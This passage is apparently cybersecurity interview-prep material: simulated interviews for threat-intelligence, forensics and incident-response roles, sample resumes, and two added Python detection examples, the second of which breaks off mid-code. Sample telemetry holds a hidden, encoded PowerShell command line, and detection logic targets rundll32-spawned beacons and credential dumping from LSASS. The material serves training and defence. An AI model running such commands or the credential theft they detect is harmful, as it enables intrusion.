I’m particularly drawn to Cybermir Defence’s focus on regional threat research and actor
tracking. I want to contribute more strategically to CTI by producing higher-value
intelligence that informs not just detections, but also threat hunting, response and
executive risk decisions.

SECTION 2: THREAT INTELLIGENCE KNOWLEDGE

Interviewer: What’s the difference between tactical, operational and strategic threat
intelligence?

Candidate:

• Tactical Intelligence focuses on IOCs, hashes, IPs, domains, and is used directly for
detection and blocking.
• Operational Intelligence provides insight into ongoing attacks: TTPs, malware
families, C2 infrastructure, used by blue teams and IR.
• Strategic Intelligence gives high-level, long-term context, such as threat actor
motivations, geopolitical risks and industry-specific targeting. This is used by
executives to assess risk and plan.

Interviewer: Can you explain the threat intelligence lifecycle?

Candidate: Sure. It includes the following phases:

1. Direction – Define requirements (e.g., what actors target our sector?)
2. Collection – Gather data from internal logs, OSINT, commercial feeds, etc.
3. Processing – Structure the data: normalisation, deduplication, enrichment
4. Analysis – Identify patterns, actor behaviour and meaningful connections
5. Dissemination – Distribute intelligence to the right audience (SOC, IR, leadership)
6. Feedback – Receive input to refine future collection or reporting

SECTION 3: TECHNICAL SKILLS – TOOLS, FRAMEWORKS, PLATFORMS

Interviewer: What threat intelligence platforms or tools do you regularly use?

Candidate: I work with:

• VirusTotal – for IOC enrichment and pivoting
• Any.Run / Hybrid Analysis – for malware sandboxing
• MISP – for structured intelligence and IOC sharing
• Group-IB Threat Intelligence – for actor tracking and infrastructure reuse
• MITRE ATT&CK Navigator – for TTP mapping and heatmaps
I also use CyberChef for decoding, URLScan.io and sometimes Shodan for
infrastructure lookups.

Interviewer: How do you track a phishing campaign over time?

Candidate:

1. Capture multiple phishing samples over time
2. Extract indicators (URLs, attachments, C2 IPs, sender info)
3. Use pivoting techniques in VirusTotal or PassiveDNS to find overlaps (hostnames,
certs, WHOIS data)
4. Correlate TTPs – like document metadata, redirect patterns or macro behaviour
5. Track infrastructure reuse or overlaps with known APT kits
6. Document and build a campaign profile that includes timeline, delivery
mechanism, observed changes and targeting pattern

Interviewer: Have you ever written a YARA rule? If so, for what?

Candidate: Yes. I wrote YARA rules to detect VBA macro malware that dropped reverse
shell payloads. I focused on identifying suspicious keywords, obfuscation functions like
Chr, Shell and encoded strings, especially those common in Agent Tesla and FormBook
loaders. I tested them in sandbox environments like Any.Run before sharing internally.

SECTION 4: SCENARIO-BASED ASSESSMENT

Interviewer: Let’s say you receive an IOC from VirusTotal: a suspicious executable hash.
How would you go about validating and enriching it?

Candidate:

1. Submit the hash to VirusTotal and review the detection ratio and behavioural
analysis
2. Pivot on:
o Domains contacted
o Mutexes created
o File names used
o PDB paths
3. Use sandbox platforms like Any.Run or Intezer to confirm malicious behaviour
4. Check for relationships with known malware families or campaigns
5. Tag relevant MITRE ATT&CK techniques (e.g., T1059 if PowerShell used)
6. Add contextual info: targeted sectors, first-seen dates, C2 activity
7. Push enriched IOC to MISP or TI dashboard with confidence levels

Interviewer: Here’s another scenario: You suspect that a client is targeted by a new spear-
phishing campaign. What’s your approach?

Candidate:

1. Collect the emails and headers
2. Analyse attachments and links (sandbox, decoding, URL tracing)
3. Identify common themes (branding, subject lines, lures)
4. Extract IOCs and perform infrastructure correlation
5. Check if it aligns with any known actor SOP (e.g., Lazarus, Mustang Panda)
6. Share a technical report with SOC and IR team with detection and hunting
recommendations
7. If attribution is high confidence, add the actor to the internal tracking database

Interviewer: We’re tracking a campaign that uses changing C2 infrastructure every 48
hours. How would you identify patterns or automate this tracking?

Candidate:

• Use VirusTotal graph to track newly linked files/domains
• Correlate TLS cert reuse, WHOIS creation pattern, ASN or hosting provider
• Write Python scripts to pull IOC sets daily and flag matches
• If patterns exist (e.g., same URL structure, dynamic DNS provider), we can write
regex for early detection
• Work with detection engineers to monitor for outbound beacons to new C2 domains
based on behavioural patterns instead of static IOCs
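The daily tracking job sketched in this answer, as an added Python example (editorial, not from the simulated interview): each new IOC from the day's pull is scored by its overlap with confirmed C2 (TLS certificate reuse, IP reuse, a campaign URL-path regex, shared ASN), anything over a threshold is flagged, and the flagged entries are folded into the known set so the next rotation is matched against them. All domains, IPs, fingerprints, the path pattern and the weights are constructed assumptions; a real job would pull the candidate set from MISP or VirusTotal rather than a literal list.

```python
import re

# Assumed URL-path shape seen on the campaign's confirmed C2 servers.
PATH_PATTERN = re.compile(r"^/[a-z0-9]{6,8}/gate\.php$")

# Assumed weights per kind of overlap with confirmed infrastructure.
WEIGHTS = {"cert_reuse": 50, "ip_reuse": 40, "path_pattern": 25, "asn_match": 15}
THRESHOLD = 40

# Confirmed C2 from earlier rotations (constructed, defanged).
KNOWN = [
    {"domain": "update-sync[.]com", "ip": "203.0.113.10", "asn": "AS64500",
     "cert_sha1": "a1b2c3d4e5f60718293a4b5c6d7e8f9012345678", "path": "/k3j9x2/gate.php"},
    {"domain": "cloud-metrics[.]net", "ip": "198.51.100.23", "asn": "AS64500",
     "cert_sha1": "a1b2c3d4e5f60718293a4b5c6d7e8f9012345678", "path": "/q8w2e4rt/gate.php"},
]

# Today's pull from the feeds (constructed), 48 hours after the last rotation.
TODAY = [
    {"domain": "cdn-metrics[.]net", "ip": "192.0.2.44", "asn": "AS64500",
     "cert_sha1": "a1b2c3d4e5f60718293a4b5c6d7e8f9012345678", "path": "/m7n2b5/gate.php"},
    {"domain": "files-share[.]org", "ip": "192.0.2.80", "asn": "AS64500",
     "cert_sha1": "ffffffffffffffffffffffffffffffffffffffff", "path": "/download"},
    {"domain": "sync-update[.]xyz", "ip": "203.0.113.10", "asn": "AS64501",
     "cert_sha1": "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee", "path": "/index.html"},
    {"domain": "login-portal[.]co", "ip": "192.0.2.99", "asn": "AS64502",
     "cert_sha1": "dddddddddddddddddddddddddddddddddddddddd", "path": "/ab12cd/gate.php"},
]


def refang(domain):
    return domain.replace("[.]", ".")


def defang(domain):
    """Report-safe form so a pasted domain is never a live link."""
    return refang(domain).replace(".", "[.]")


def score(candidate, known):
    """Score one new IOC by how much it overlaps confirmed infrastructure."""
    reasons = []
    if candidate["cert_sha1"] in {k["cert_sha1"] for k in known}:
        reasons.append("cert_reuse")
    if candidate["ip"] in {k["ip"] for k in known}:
        reasons.append("ip_reuse")
    if PATH_PATTERN.match(candidate["path"]):
        reasons.append("path_pattern")
    if candidate["asn"] in {k["asn"] for k in known}:
        reasons.append("asn_match")
    return sum(WEIGHTS[r] for r in reasons), reasons


def triage(candidates, known, threshold=THRESHOLD):
    """(defanged domain, score, reasons) for every IOC at or over the threshold, highest first."""
    hits = []
    for c in candidates:
        total, reasons = score(c, known)
        if total >= threshold:
            hits.append((defang(c["domain"]), total, reasons))
    return sorted(hits, key=lambda h: -h[1])


def rotate(candidates, known, threshold=THRESHOLD):
    """Daily job: flag today's overlaps, then fold them into the known set for tomorrow."""
    hits = triage(candidates, known, threshold)
    flagged = {h[0] for h in hits}
    return hits, known + [c for c in candidates if defang(c["domain"]) in flagged]


if __name__ == "__main__":
    for hit in triage(TODAY, KNOWN):
        print(hit)
```

A path match on its own (login-portal[.]co, 25) stays below the threshold and is only a hunting lead, while a certificate shared with known C2 plus the path shape (cdn-metrics[.]net, 90) is strong enough to hand to detection engineering; the weights encode exactly that confidence ordering.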

SECTION 5: INTELLIGENCE REPORTING & COLLABORATION

Interviewer: How do you make intelligence reports relevant for both technical teams and
executives?

Candidate: I create two layers:

• Tactical Brief: IOC tables, kill chain mapping, observed techniques, detection
suggestions
• Executive Summary: Business risk, industry trends, potential impact, actor
motivation
I use visuals like heat maps, timelines and a simplified risk scoring model. Clarity
and relevance to business objectives are key.

Interviewer: How do you handle false attribution or conflicting intel across different TI
sources?

Candidate:

• Compare TTPs, infrastructure and malware characteristics
• Weigh source reputation and confidence level
• Avoid definitive attribution unless multiple strong signals align
• Use qualifiers like "possibly linked to" or "TTPs similar to"
• Highlight discrepancies transparently in reporting

SECTION 6: ATTRIBUTION, ACTOR TRACKING, INTEL LIFECYCLE

Interviewer: Which actor groups do you follow most closely and why?

Candidate: I follow APT36, Mustang Panda and Lazarus Group due to their frequent
targeting of Southeast Asia and use of phishing + living-off-the-land binaries. Their TTPs
change often, so tracking their infrastructure and malware delivery methods gives valuable
context for local clients.

Interviewer: How would you update detection content based on CTI findings?

Candidate:

• Translate actor TTPs to Sigma rules (e.g., T1218.005 for mshta abuse)
• Share payload characteristics with EDR/IR teams
• Update IOC watchlists and alert thresholds
• Recommend suppression for benign overlap cases
• Test detection efficacy post-update with simulated artefacts

SECTION 7: CLOSING & QUESTIONS

Interviewer: Thanks Patrice, that wraps up our questions. Do you have anything you’d like
to ask us?

Candidate: Yes, thank you:

1. Does the CTI team here work closely with red or blue teams for intelligence
validation?
2. Are there opportunities to contribute to open-source research or public CTI reports
under Cybermir Defence’s name?
3. What’s the maturity level of your internal threat actor database? Is there room for
contribution?

CYBERSECURITY ANALYST L2 RESUME

RYAN GIGGS
Cybersecurity Analyst | DFIR-Focused | Incident Response | Digital Forensics
Cyberjaya, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/ryangiggs | GitHub: github.com/ryancyber

PROFESSIONAL SUMMARY

Experienced Cybersecurity Analyst with over 4 years of hands-on experience in SOC
environments. Skilled in triage, containment, malware behaviour analysis and forensic
investigation support. Has responded to real-world security incidents including
ransomware outbreaks, credential theft and insider abuse. Proficient in live response, IOC
pivoting, log reconstruction and digital evidence preservation. Now seeking to transition
into a Cybersecurity Analyst L3 – DFIR role to lead incident investigations and contribute to
forensic readiness and threat remediation.

CURRENT ROLE

Cybersecurity Analyst (L2)
IzzmierCyber Defense Sdn Bhd – Kuala Lumpur, Malaysia
Sept 2021 – Present

• Investigated and escalated over 300 incidents involving phishing, malware
infections and lateral movement
• Performed live incident triage using EDR tools (Cortex XDR, CrowdStrike Falcon)
and forensics tools (Velociraptor, FTK Imager)
• Participated in full incident lifecycle: identification, containment, eradication,
recovery and RCA reporting
• Conducted malware detonation and behavioural analysis using Any.Run and Hybrid
Analysis
• Assisted in acquisition of memory dumps, disk images and volatile artefacts during
post-compromise analysis
• Developed checklists for ransomware response and credential theft playbooks

Key Achievements:

• Isolated and analysed a targeted malware variant via memory analysis and string
extraction
• Contained lateral movement of ransomware via quick pivoting through firewall, AD and
endpoint logs
• Reduced IR response time by 40% through automation of initial evidence gathering
scripts

EDUCATION

Bachelor of Information Technology (Networking)
Universiti Teknologi MARA (UiTM), Malaysia
Graduated: July 2021 | CGPA: 3.45

CERTIFICATIONS

• GIAC Certified Forensic Analyst (GCFA) – In Progress
• CompTIA CySA+ – Cybersecurity Analyst
• Microsoft SC-200 – Security Operations Analyst
• TryHackMe: DFIR & Malware Analysis Paths – Completed
• Certified Incident Handler (ECIH) – EC-Council

TECHNICAL SKILLS

Incident Response & DFIR Tools:

• Cortex XDR, CrowdStrike, Velociraptor, FTK Imager, Volatility, Autopsy, Redline,
Plaso, Cyber Triage

Malware & Threat Analysis:

• Any.Run, Hybrid Analysis, CyberChef, PEStudio, YARA, Process Hacker

Forensics & Logs:

• Windows Event Logs, Sysmon, Zeek (formerly Bro), PowerShell history, USN journal,
MFT analysis

Cloud Incident Response:

• AWS CloudTrail, Azure Audit Logs, Microsoft Defender for Endpoint

Scripting & Automation:

• Python (IOC extractor, memory hash validator), Bash, Sigma rule writing

PROJECTS & INVESTIGATIONS

Insider Threat Forensic Investigation

• Investigated data exfiltration via USB and cloud uploads
• Used FTK Imager for disk analysis and identified browser artefacts and exfil paths
• Correlated USB insertions, file copy logs and suspicious Dropbox activity

Ransomware Case Response – Q1 2024

• Involved in real-time incident triage after detection of encryption on shared drives
• Analysed process tree, ransomware note and lateral movement patterns
• Supported live host containment, memory capture and attack chain reconstruction

DFIR Toolkit Automation Project

• Wrote scripts for mass log export from infected hosts (Event Logs, Autoruns,
Prefetch)
• Created standardised initial evidence collection checklist for L1 handoff

DOCUMENTATION & REPORTING

• Wrote post-incident reports including MITRE ATT&CK mapping and IOCs
• Built standard RCA templates and forensic chain-of-custody forms
• Documented internal playbooks for malware analysis and credential dumping

SOFT SKILLS & TEAM CONTRIBUTION

• Calm under pressure during live attacks
• Proven track record in incident coordination and cross-team response
• Provided knowledge transfer sessions on memory analysis and timeline building
• Collaborative with SOC, legal and IT ops teams during DFIR investigations

SIMULATED INTERVIEW FOR A CANDIDATE APPLYING FOR THE ROLE OF CYBERSECURITY
ANALYST L3 – DIGITAL FORENSICS & INCIDENT RESPONSE (DFIR)

SECTION 1: INTRODUCTION & MOTIVATION

Interviewer: Hi Ryan! Let’s start with a quick introduction. Can you tell us about your
background and what made you apply for the L3 DFIR position here at Cybermir Defence?

Candidate (Ryan): Thank you. I’m Ryan Giggs, currently a Level 2 Cybersecurity Analyst at
IzzmierCyber Defense, with over four years of SOC experience. In the past two years, I’ve
been deeply involved in incident handling, live response and forensic support during
malware and insider threat cases. I’ve conducted disk imaging, memory analysis and
helped document root cause analysis for real-world ransomware and credential theft
cases.
I'm excited about Cybermir Defence's reputation for deep forensic work and advanced
incident handling. I'm ready to lead DFIR investigations and contribute to post-incident
analysis, playbook development and forensic readiness initiatives at an L3 level.

SECTION 2: CORE DFIR KNOWLEDGE

Interviewer: Explain the difference between volatile and non-volatile data in forensics.
Which would you collect first and why?

Candidate: Volatile data includes temporary or real-time information in memory, like
running processes, open network connections, clipboard contents, etc. Non-volatile data
is persistent, such as files on disk, registry hives and system logs.
In a live incident, I would prioritise collecting volatile data first, especially from memory,
because it’s lost when the system powers off. Capturing a memory dump, network activity
and current processes is essential for incident reconstruction.

Interviewer: What are the main phases of an incident response process?

Candidate:

1. Preparation – Tools, teams, documentation and readiness
2. Identification – Detect and validate the incident
3. Containment – Limit the spread (short and long-term strategies)
4. Eradication – Remove root cause (malware, persistence)
5. Recovery – Restore affected systems securely
6. Lessons Learned – Document RCA, update detection and playbooks

SECTION 3: TECHNICAL TOOLS & METHODOLOGY

Interviewer: Which forensic tools have you used and for what purposes?

Candidate:

• Velociraptor – For live response and artefact collection
• FTK Imager – For disk imaging and file extraction
• Autopsy – Timeline and artefact analysis
• Volatility – Memory analysis for processes, DLLs, network connections
• Redline – Quick triage and memory snapshot collection
• CyberChef – Decoding and string manipulation
• YARA – Custom malware signature detection

Interviewer: How do you preserve evidence integrity during forensic investigations?

Candidate:

• Use write blockers for disk acquisition
• Hash all collected images (MD5/SHA256) before and after acquisition
• Store in a secured repository with access control
• Maintain chain-of-custody documentation
• Use trusted tools and verify collection scripts before execution

Interviewer: What Windows artefacts are important during post-compromise
investigation?

Candidate:

• $MFT / $LogFile – File activity tracking
• Shimcache / Amcache – Evidence of execution
• Prefetch – Last run timestamp of executables
• Windows Event Logs – Security (4624, 4625), Sysmon (1, 3, 10, etc.)
• Registry Hives – Persistence keys in Run, Services, Image File Execution Options
• Jump Lists & LNK Files – Recently accessed documents

SECTION 4: SCENARIO-BASED RESPONSE

Interviewer: Let’s say a user reports their files were renamed with .CRYPT3 and a ransom
note appears. Walk us through your steps.

Candidate:

1. Initial Response:
o Instruct user to disconnect from the network
o Capture a memory dump and volatile data
o Identify the ransomware variant (check ransom note, file headers,
command-line activity)
2. Containment:
o Isolate other machines showing encryption signs
o Block associated IPs/C2 if known
3. Investigation:
o Review Sysmon for dropped files, suspicious child processes
o Check use of vssadmin, wevtutil or shadow copy deletion
o Trace lateral movement (e.g., via SMB, RDP logs)
4. Eradication & Recovery:
o Remove malware
o Rebuild from backups (verify clean)
5. Post-Incident:
o Document full attack chain
o Deliver IOCs to SOC for future detections
o Update ransomware playbook

Interviewer: During a phishing attack, credentials were stolen. What logs and artefacts
would you collect?

Candidate:

• Email headers & full message – Trace sender, SPF/DKIM/DMARC status
• Web proxy logs – If user clicked links
• Credential usage logs – AD logs (4624, 4768), VPN logs
• Browser history – Suspicious redirects
• Endpoint logs – Credential manager access, keylogger payload
• MFA logs – To confirm bypass attempts
• I’d also check whether reused credentials were used for lateral movement.

SECTION 5: MALWARE ANALYSIS & MEMORY FORENSICS

Interviewer: How do you investigate a memory dump of a suspected compromised
machine?

Candidate: Using Volatility:

• pslist, pstree – See running processes
• malfind – Detect injected code
• cmdline, procdump – Review commands and extract binaries
• netscan – List open network connections
• dlllist, ldrmodules – See loaded DLLs
After extracting suspicious binaries, I’d check with Any.Run, run strings and scan
with YARA rules to identify malware families.

Interviewer: How would you detect credential dumping in memory?

Candidate:

• Check for suspicious access to lsass.exe
• Look for known tools like mimikatz.exe or LOLBins like rundll32
• Use handles and cmdline to see if unusual processes access LSASS
• Scan memory using YARA rules for known mimikatz signatures
• Cross-check event logs and execution timestamps

SECTION 6: REPORTING, CHAIN OF CUSTODY & COLLABORATION

Interviewer: What should a post-incident report contain?

Candidate:

• Executive Summary: Timeline, impacted assets, summary of attack
• Technical Details: MITRE mapping, IOCs, logs, malware behaviour
• Root Cause Analysis: Entry point, privilege escalation, lateral movement
• Remediation Actions: What was done, what is pending
• Lessons Learned & Recommendations: Prevention tips, IR playbook updates
• Appendices: Evidence hashes, tool outputs, memory/disk artefacts

Interviewer: How do you ensure collaboration between DFIR, legal and other
stakeholders?

Candidate:

• Maintain clear, timestamped logs of findings
• Use TLP classifications when sharing sensitive intel
• Limit forensic access to authorised team members
• Provide concise updates in non-technical language to legal/HR
• Work closely with SOC and TI teams to align on detections and follow-up actions

SECTION 7: CLOSING & QUESTIONS

Interviewer: Thank you, Ryan. That’s all from us. Do you have any questions for us?

Candidate: Yes, thank you:

1. Does Cybermir Defence run internal red/blue/purple team simulations to validate IR
readiness?
2. Will the L3 DFIR role have access to cloud forensic tooling and support for
certification like GCFA or GNFA?
3. What’s your current incident frequency and the typical engagement model:
retainer, MDR clients or on-demand?

CYBERSECURITY ANALYST L2 RESUME

ROY KEANE
Cybersecurity Analyst | Incident Responder | Threat Containment & Root Cause Analysis
Kuala Lumpur, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/roykeane | GitHub: github.com/roycyber

PROFESSIONAL SUMMARY

Experienced and high-performing Cybersecurity Analyst with 4+ years of hands-on
experience in real-world incident response operations. Skilled in identifying, triaging,
containing and investigating security incidents across on-prem and cloud environments.
Strong knowledge of attack life cycle, incident coordination and MITRE ATT&CK mapping.
Now seeking to transition into a Cybersecurity Analyst L3 (Incident Responder) role to lead
investigations, improve IR playbooks and drive rapid containment across critical
infrastructure.

CURRENT ROLE

Cybersecurity Analyst – Level 2 (Incident Response Focus)
IzzmierCyber Defense Sdn Bhd – Cyberjaya, Malaysia
Sept 2021 – Present

• Lead triage and response to high-severity incidents including credential theft,
malware outbreaks, insider misuse and lateral movement
• Perform root cause analysis (RCA), forensic artefact review and full incident
timeline reconstruction
• Use Cortex XDR, SentinelOne and Splunk to investigate, correlate and document
attack paths
• Act as escalation point for L1 analysts, guiding their investigation and response
actions
• Coordinate with clients during containment and recovery planning
• Regularly update and optimise IR playbooks for phishing, malware, privilege
escalation and command-and-control scenarios

Key Accomplishments:

• Contained a live ransomware attempt by isolating 7 machines within 20 minutes of
initial detection
• Built a rapid-response checklist for credential theft that reduced containment time by
35%
• Drafted executive-level post-incident reports for multiple financial sector clients

EDUCATION

Bachelor of Information Technology (Networking)
Universiti Teknologi MARA (UiTM), Malaysia
Graduated: July 2021 | CGPA: 3.45

CERTIFICATIONS

• CompTIA CySA+ – Cybersecurity Analyst
• Microsoft SC-200 – Security Operations Analyst
• EC-Council ECIH – Certified Incident Handler
• SANS SEC504/GCIH – In Progress
• TryHackMe: Incident Response & Malware Analysis Paths – Completed

TECHNICAL SKILLS

Incident Response & EDR

• Cortex XDR, SentinelOne, CrowdStrike Falcon, Microsoft Defender
• Live response, host isolation, process analysis, persistence discovery

Log Analysis & SIEM

• Splunk, Wazuh, Microsoft Sentinel
• Correlation rules, IOC lookups, behavioral queries

Threat Hunting & IOC Enrichment

• MITRE ATT&CK, Sigma, CyberChef, VirusTotal, Any.Run
• Detection of lateral movement, privilege abuse, C2 channels

Malware & Memory Artefact Triage

• Process Hacker, YARA, PEStudio, Redline, Volatility (basic usage)

Cloud & Hybrid Environment Support

• AWS CloudTrail, Azure Activity Logs, O365 email investigation

PROJECTS & INCIDENTS HANDLED

Banking Sector – Phishing to Credential Abuse Case

• Detected MFA bypass attempt following successful phishing
• Identified attacker using valid credentials across VPN
• Coordinated user account lockdown, password resets and SOC-wide alerting

Ransomware Attempt – Endpoint Triage & Containment

• Cortex XDR alert on vssadmin delete shadows
• Quickly isolated affected hosts, blocked lateral paths
• Recovered full attack sequence and submitted to TI team for actor profiling

Insider Threat – Unauthorised File Transfer

• Detected unusual USB and cloud storage use
• Acquired logs and LNK files to trace exact files exfiltrated
• Worked with HR and legal for formal evidence documentation

DOCUMENTATION & REPORTING

• Developed SOPs for phishing, malware response and data exfiltration
• Wrote post-incident RCA reports with full MITRE ATT&CK mapping
• Updated playbooks and containment workflow charts quarterly

SOFT SKILLS & LEADERSHIP

• Calm under pressure, decisive during live incidents
• Strong communicator with clients, legal and internal teams
• Trusted L2 escalation handler for major clients
• Mentor to new L1 hires in detection logic and IR flow

SIMULATED INTERVIEW FOR A CANDIDATE APPLYING FOR THE POSITION OF
CYBERSECURITY ANALYST L3 – INCIDENT RESPONSE

SECTION 1: INTRODUCTION & MOTIVATION

Interviewer: Hi Roy, welcome to Cybermir Defence. Can you start by introducing yourself
and sharing why you're interested in this L3 Incident Response role?

Candidate (Roy): Thank you. I’m Roy Keane, currently a Level 2 Cybersecurity Analyst at
IzzmierCyber Defense. I’ve spent the last four years in active SOC environments, but over
the past two, my focus has shifted heavily into incident response. I’ve led containment
during ransomware attempts, coordinated with stakeholders during phishing-to-MFA-
bypass incidents and authored RCA reports with MITRE mapping.
I’m applying for this L3 role at Cybermir Defence because your response centre is known
for leading regional investigations and building out response automation. I’m ready to take
the lead in incident triage, evidence gathering and post-incident lessons learned while
contributing to IR maturity and knowledge sharing.

SECTION 2: CORE INCIDENT RESPONSE KNOWLEDGE

Interviewer: Can you walk us through the standard phases of an incident response?

Candidate: Certainly. The six phases are:

1. Preparation – Policies, tools, runbooks, team readiness
2. Identification – Detecting and confirming an incident
3. Containment – Stopping the threat short-term and long-term
4. Eradication – Removing the root cause (e.g., malware, persistence)
5. Recovery – Returning systems to production, monitoring post-recovery
6. Lessons Learned – RCA, documentation, updates to detection and SOPs

Interviewer: How do you define a “security incident” versus a “security event”?

Candidate: A security event is any observable occurrence in a system or network, like a
login or a file transfer. A security incident is when that event indicates a breach or
malicious activity, for example, multiple failed logins followed by a successful one from an
unusual IP may escalate from an event to an incident based on context.

Interviewer: What metrics do you consider when evaluating the effectiveness of an IR
team?

Candidate:

• MTTD (Mean Time to Detect)
• MTTR (Mean Time to Respond)
• Containment Time
• False Positive Rate
• Incident Closure SLA
I also look at qualitative feedback, e.g., whether analysts are consistently applying
RCA and post-incident improvements.

SECTION 3: TECHNICAL IR SKILLS & TOOLS

Interviewer: What are your go-to tools for investigating endpoint-related incidents?

Candidate:

• Cortex XDR & SentinelOne – For EDR telemetry, process trees, host isolation
• Redline & Velociraptor – For live response and memory artefact collection
• Autoruns, Process Hacker, PEStudio – For persistence and suspicious binaries
• Volatility – For memory analysis
• CyberChef – For decoding payloads or encoded PowerShell
I usually start with EDR pivoting and memory capture if there's evidence of post-
exploitation activity.

Interviewer: Have you worked on automating any part of the IR process?

Candidate: Yes. I created Python scripts that automatically enrich alerts with WHOIS and
VirusTotal data. We also used SOAR (via Cortex XSOAR) to auto-isolate hosts upon
confirmed IOC match, notify stakeholders and open a ticket in the IR queue.

Interviewer: How do you handle IR in a hybrid cloud environment?

Candidate:

• For Azure: Review Audit Logs, Defender for Cloud alerts and AAD sign-ins
• For AWS: Use CloudTrail, GuardDuty and IAM role history
• Investigate IAM abuse, misconfigurations and lateral movement using CLI logs
• I ensure all IR actions are cloud-safe (e.g., acquiring volatile logs via APIs instead of
snapshots where possible)

SECTION 4: SCENARIO-BASED WALKTHROUGH

Interviewer: Let’s do a walkthrough. A user reports their PC is running slow. EDR shows
rundll32.exe spawning PowerShell that connects to an IP in Russia. What do you do?

Candidate:

1. Triage the Alert:
o Validate the alert with EDR: check parent process, command line, IP
reputation
2. Isolate the Host:
o Immediately isolate via EDR to stop any lateral movement
3. Collect Evidence:
o Take a memory snapshot
o Capture event logs (Sysmon, Security), prefetch and persistence points
4. Investigate:
o Decode PowerShell payload (base64, obfuscation)
o Check for additional persistence (scheduled tasks, registry run keys)
o Trace other connections and domain resolutions
5. Containment:
o Remove malware
o Reset credentials if credential theft is suspected
6. Eradication & Recovery:
o Patch any vulnerabilities exploited
o Reimage if system integrity is questionable
7. RCA & Reporting:
o Deliver detailed MITRE ATT&CK-mapped report
o Share IOCs with SOC and TI teams

Interviewer: What logs would you collect for lateral movement detection?

Candidate:

• Windows Event Logs – Event ID 4624, 4672, 4688
• Sysmon – Event ID 1 (process), 3 (network), 10 (registry), 11 (file create)
• Firewall Logs – RDP, SMB traffic
• DNS Logs – Hostname resolution anomalies
• EDR Logs – Parent-child anomalies, access to wmic, psexec, smbexec

SECTION 5: MALWARE, LOGS, CLOUD & ENDPOINT RESPONSE

Interviewer: If you find lsass.exe being accessed by an unknown process, what would you
do?

Candidate:

• Flag it as potential credential dumping
• Dump memory and scan with YARA for mimikatz or similar signatures
• Review command-line and parent process (e.g., rundll32 or wmic abuse)
• Disable affected user accounts, change passwords, review lateral logs
• Share indicators with detection team and initiate environment-wide sweep

Interviewer: How do you confirm an O365 account was compromised?

Candidate:

• Check AAD sign-ins for unusual geolocation or impossible travel
• Look for forwarding rules or inbox rule manipulation
• Review audit logs for login anomalies and permission changes
• Confirm MFA activity (if present) and token issuance patterns
• Advise password reset, session revocation and log sweep for post-compromise
activity

SECTION 6: COMMUNICATION, COLLABORATION & RCA

Interviewer: How do you coordinate with SOC and threat intel during an ongoing incident?

Candidate:

• Set up an incident channel for live updates
• Provide SOC with updated IOCs and TTPs to refine detections
• Coordinate with TI for any external matching or actor attribution
• Ensure documentation is consistent across teams for RCA purposes

Interviewer: How do you handle pressure during a live incident with senior stakeholders
involved?

Candidate: I stay focused on facts, stick to known data and give frequent, clear updates. I
provide confidence ratings, explain next steps and avoid technical overload when speaking
to non-technical execs. After stabilising the incident, I ensure the RCA is thorough to
prevent recurrence.

SECTION 7: CLOSING & QUESTIONS

Interviewer: Thanks Roy. That concludes the technical part. Do you have any questions for
us?

Candidate: Yes, thank you:

1. How does Cybermir Defence structure the escalation process between L2 and L3
during high-severity incidents?
2. Does the L3 IR role get involved in red team aftermath or purple teaming activities?
3. Is there support for advanced training or certifications like GCIH, GCFA or cloud IR
labs?
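As an added example, not part of the interview or of either company's tooling: a small Python triage over constructed Sysmon-style events that flags the rundll32.exe-to-PowerShell chain with an outbound connection and an unexpected process opening lsass.exe, the two patterns discussed in the scenario and credential-dumping answers above. The LSASS allow-list, the access-right mask, the RFC 1918 "internal" definition and the sample events are assumptions constructed for the example.

```python
"""Added example: triage constructed Sysmon-style events for the two patterns
the candidate describes, rundll32.exe spawning a PowerShell beacon and an
unexpected process opening lsass.exe (possible credential dumping).

Sysmon event IDs used: 1 = ProcessCreate, 3 = NetworkConnect, 10 = ProcessAccess."""
from ipaddress import ip_address, ip_network

PROCESS_CREATE, NETWORK_CONNECT, PROCESS_ACCESS = 1, 3, 10

# Assumption: RFC 1918 ranges are "internal"; anything else counts as external.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Assumption: processes expected to open LSASS on a Windows host. Tune per
# environment (the EDR agent's own process will need adding, for instance).
LSASS_ALLOWED_SOURCES = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}

PROCESS_VM_READ = 0x10  # access right required to read another process's memory

# Constructed sample telemetry in the shape of Sysmon EventData fields.
# 203.0.113.45 is from the RFC 5737 documentation range, not a real address.
CONSTRUCTED_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc <CONSTRUCTED_BASE64>"},
    {"EventID": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationIp": "203.0.113.45", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationIp": "10.20.30.40", "DestinationPort": 5985},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path, so comparisons ignore location/case."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_external(ip: str) -> bool:
    """True when the destination is outside every RFC 1918 range."""
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def flag_rundll32_powershell(events):
    """ProcessCreate where rundll32.exe is the parent of PowerShell."""
    return [
        {"rule": "rundll32_spawns_powershell", "index": i, "detail": e["CommandLine"]}
        for i, e in enumerate(events)
        if e["EventID"] == PROCESS_CREATE
        and basename(e["ParentImage"]) == "rundll32.exe"
        and basename(e["Image"]) in {"powershell.exe", "pwsh.exe"}
    ]


def flag_powershell_external(events):
    """NetworkConnect from PowerShell to a non-RFC 1918 destination."""
    return [
        {"rule": "powershell_external_connect", "index": i,
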